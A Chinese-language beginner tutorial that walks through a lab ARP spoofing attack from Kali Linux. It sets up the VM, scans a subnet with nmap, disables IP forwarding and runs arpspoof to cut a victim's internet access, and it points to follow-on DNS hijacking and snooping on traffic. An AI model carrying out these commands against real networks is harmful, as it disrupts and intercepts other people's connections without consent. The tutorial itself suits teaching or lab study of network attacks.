0-1 从零开始到实现arp 断网
部署环境
-
安装kali Linux
这里选择使用kali linux 主要是因为其环境包含了大量安全渗透工具
https://www.kali.org/get-kali/#kali-virtual-machines
- 导入下载的 .vmdk 文件(正常下载得到的是zip 压缩包,需解压导入)
选择导入的虚拟机文件
即可获取到一台正常的kali linux 系统(默认用户密码:kali kali)
-
进行初始化的环境配置,若是想要进行实际的断网攻击,这里的网络适配器需修改为桥接模式,我这里仅作攻击演示,所以采用虚拟机环境,使用NAT 模式
桥接 : 虚拟机被视为真实的物理机,获得到一个真实IP地址
NAT : 虚拟机可正常上网,但其环境始终是位于一个虚拟的内网环境,通过宿主机作为桥接上网
仅主机(Host-Only) : 仅仅与宿主机进行数据传输,无法正常上网
实施攻击
4 .信息搜集,获取到受害者IP地址为192.168.111.128 , 进行断网攻击
这里的操作需要用到root 用户可使用一下命令登录root 用户
sudo passwd root (修改root 密码)
su root (切换至root 用户)
ifconfig 确认自己目前处于的网段,方便后续对于网段中的主机进行定位攻击
这里确认到我攻击机所处于的网段为192.168.111.0/24,对于此网段进行扫描nmap -sV 192.168.111.0/24,发现受害主机192.168.111.128
确认受害主机情况,其可正常上网
进行arp 断网攻击,关闭端口转发
echo 0 > /proc/sys/net/ipv4/ip_forward # 关闭端口转发,1为开启转发,0为关闭转发
arpspoof -i eth0 -t 目标IP地址 网关IP地址 # 进行arp 欺骗断网攻击
攻击机发起断网攻击后,受害的的arp 表发生了改变,并且无法正常上网了
简单扩展
arp 断网攻击也被称为,中间人攻击,所以能进行的攻击点当然不仅仅只是断网,还可能进DNS 劫持,偷偷查看受害者上网数据(如浏览的图片、视频等),这里就不过多赘述了,可以以此为起始点